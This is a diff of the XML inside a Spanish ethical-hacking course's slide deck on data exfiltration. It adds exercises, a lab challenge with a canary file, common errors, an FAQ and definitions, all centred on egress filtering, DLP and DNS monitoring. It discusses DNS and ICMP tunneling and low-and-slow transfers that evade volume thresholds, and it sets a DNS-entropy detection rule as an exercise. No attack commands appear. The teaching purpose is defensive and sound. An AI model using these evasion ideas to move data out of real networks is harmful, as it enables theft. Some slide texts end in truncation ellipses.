--- a/classes/parte-3-hacking-etico-y-pentesting-metodologia/083-exfiltracion-de-datos/clase-083-presentacion.pptx
+++ b/classes/parte-3-hacking-etico-y-pentesting-metodologia/083-exfiltracion-de-datos/clase-083-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,67 +3239,67 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Usar datos reales del cliente para "demostrar" — Nunca. Usa siempre un archivo canario ficticio. La demostración de que el canal existe es suficiente.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  El firewall del lab no bloquea nada tras -P OUTPUT DROP — Faltan reglas de estado; añade -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT con cuidado, o revisa el orden de las reglas.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  DNS tunneling "no se ve" en los logs — No estás registrando consultas DNS; habilita el dns.log de Zeek o el logging del resolvedor.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Confundir C2 con exfiltración en el informe — El C2 es el canal de control; la exfiltración es la salida de datos. Sepáralos en la narrativa.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Asumir que TLS = indetectable — El metadato (destino, volumen, JA3, timing) sigue siendo visible aunque el contenido esté cifrado.</a:t>
+              <a:t>•  Clasifica en MITRE ATT&amp;CK: ¿T1041 (over C2) o T1048 (alternative protocol)? Justifica con un ejemplo de cada uno.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Explica por qué DNS e ICMP son canales atractivos para un atacante y qué control los neutraliza.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Diseña una regla de detección (pseudo-Sigma) para "consulta DNS con subdominio &gt; 50 caracteres y alta entropía".</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Calcula cuánto tardaría una exfiltración "low and slow" de 1 GB a 1 KB cada 5 min, y por qué esa lentitud evade umbrales de volumen.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Propón una política de egress filtering mínima para un servidor que solo debe hablar con un repositorio interno.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3347,7 +3350,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3385,82 +3388,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Debo exfiltrar datos reales para probar el riesgo al cliente?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  No. Basta con demostrar que el canal funciona usando un archivo canario. Extraer datos reales añade riesgo legal y de exposición sin aportar valor.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Cuál es la defensa número uno?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  El egress filtering: por defecto denegar todo el tráfico saliente y permitir solo lo imprescindible. Complementado con DLP y monitoreo de DNS.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Por qué se estudia esto en un curso defensivo?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Porque no puedes detectar ni bloquear lo que no entiendes. Conocer los canales y sus huellas es lo que permite escribir buenas detecciones.</a:t>
+              <a:t>•  Monta el canal HTTP del laboratorio, captura el tráfico, luego aplica egress filtering y demuestra que la transferencia del canario ahora falla.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: entregas (a) el .pcap con la transferencia inicial identificada, (b) la regla de egress aplicada, y (c) una captura/log que evidencia el bloqueo posterior. Todo con el archivo…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3511,7 +3454,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3549,6 +3492,319 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  Usar datos reales del cliente para "demostrar" — Nunca. Usa siempre un archivo canario ficticio. La demostración de que el canal existe es suficiente.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  El firewall del lab no bloquea nada tras -P OUTPUT DROP — Faltan reglas de estado; añade -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT con cuidado, o revisa el orden de las reglas.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  DNS tunneling "no se ve" en los logs — No estás registrando consultas DNS; habilita el dns.log de Zeek o el logging del resolvedor.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Confundir C2 con exfiltración en el informe — El C2 es el canal de control; la exfiltración es la salida de datos. Sepáralos en la narrativa.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Asumir que TLS = indetectable — El metadato (destino, volumen, JA3, timing) sigue siendo visible aunque el contenido esté cifrado.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Debo exfiltrar datos reales para probar el riesgo al cliente?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  No. Basta con demostrar que el canal funciona usando un archivo canario. Extraer datos reales añade riesgo legal y de exposición sin aportar valor.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Cuál es la defensa número uno?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  El egress filtering: por defecto denegar todo el tráfico saliente y permitir solo lo imprescindible. Complementado con DLP y monitoreo de DNS.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué se estudia esto en un curso defensivo?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Porque no puedes detectar ni bloquear lo que no entiendes. Conocer los canales y sus huellas es lo que permite escribir buenas detecciones.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  MITRE ATT&amp;CK — Exfiltration (TA0010)</a:t>
             </a:r>
           </a:p>
@@ -3599,6 +3855,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="447a4d8b6c547107.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="2578608"/>
+            <a:ext cx="8229600" cy="2340864"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3683,7 +4014,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Comprender la fase de exfiltración dentro del ciclo de un ataque: cómo se demuestra de forma controlada el impacto real de un compromiso (probar que "los datos podían salir") y, con la misma profundidad, qué señales deja y cómo un equipo defensivo (DLP, NSM, egress filtering) la detecta y la bloquea. El objetivo del pentester ético no es robar datos, sino probar el riesgo y ayudar a cerrarlo.</a:t>
+              <a:t>•  Comprender la fase de exfiltración dentro del ciclo de un ataque: cómo se demuestra de forma controlada el impacto real de un compromiso (probar que "los datos podían salir") y, con la misma…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4077,7 +4408,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4115,97 +4446,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Exfiltración de datos</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Táctica en la que un actor transfiere datos fuera de la red objetivo. Característica clave: en un pentest ético se demuestra con datos ficticios/canario, nunca con información real del cliente.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Egress filtering</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Control que restringe el tráfico saliente a solo lo estrictamente necesario (puertos, destinos, protocolos). Es la contramedida más eficaz: si el tráfico no puede salir, no hay exfiltración.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  DLP (Data Loss Prevention)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Conjunto de tecnologías que inspeccionan datos en movimiento/reposo/uso para bloquear la salida de información sensible según políticas (patrones de tarjetas, PII, clasificación).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  DNS tunneling</a:t>
+              <a:t>•  El robo de datos no es un acto único, y separarlo en fases es lo que permite detectarlo a</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  tiempo. La recolección (collection) reúne los datos dentro de la red del objetivo. El</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  C2 (command and control) es el canal por el que el atacante controla el acceso. Y la</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  exfiltración es el acto de sacar los datos fuera. Son momentos distintos con</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  telemetría distinta, y un defensor que solo vigila uno llega tarde. MITRE ATT&amp;CK incluso</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  distingue si la exfiltración va sobre el canal de C2 (T1041) o por un canal alternativo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  (T1048), porque cambia dónde hay que mirar.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4256,7 +4587,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4294,22 +4625,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Laboratorio aislado (dos VMs: "atacante" y "víctima" bajo tu control, ambas tuyas). Herramientas de estudio: tcpdump/Wireshark para observar el canal, un servidor HTTP propio para el destino, y utilidades de red estándar. Del lado defensivo: reglas de egress en el firewall del lab (iptables/pfSense), y opcionalmente Zeek para ver los logs de DNS/HTTP. Nunca uses datos reales; genera un archivo canario:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  echo "CANARIO-PENTEST-$(date +%s) — dato ficticio de laboratorio" &gt; /tmp/canario.txt</a:t>
+              <a:t>•  Exfiltración de datos</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Táctica en la que un actor transfiere datos fuera de la red objetivo. Característica clave: en un pentest ético se demuestra con datos ficticios/canario, nunca con información real del cliente.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Egress filtering</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Control que restringe el tráfico saliente a solo lo estrictamente necesario (puertos, destinos, protocolos). Es la contramedida más eficaz: si el tráfico no puede salir, no hay exfiltración.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  DLP (Data Loss Prevention)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
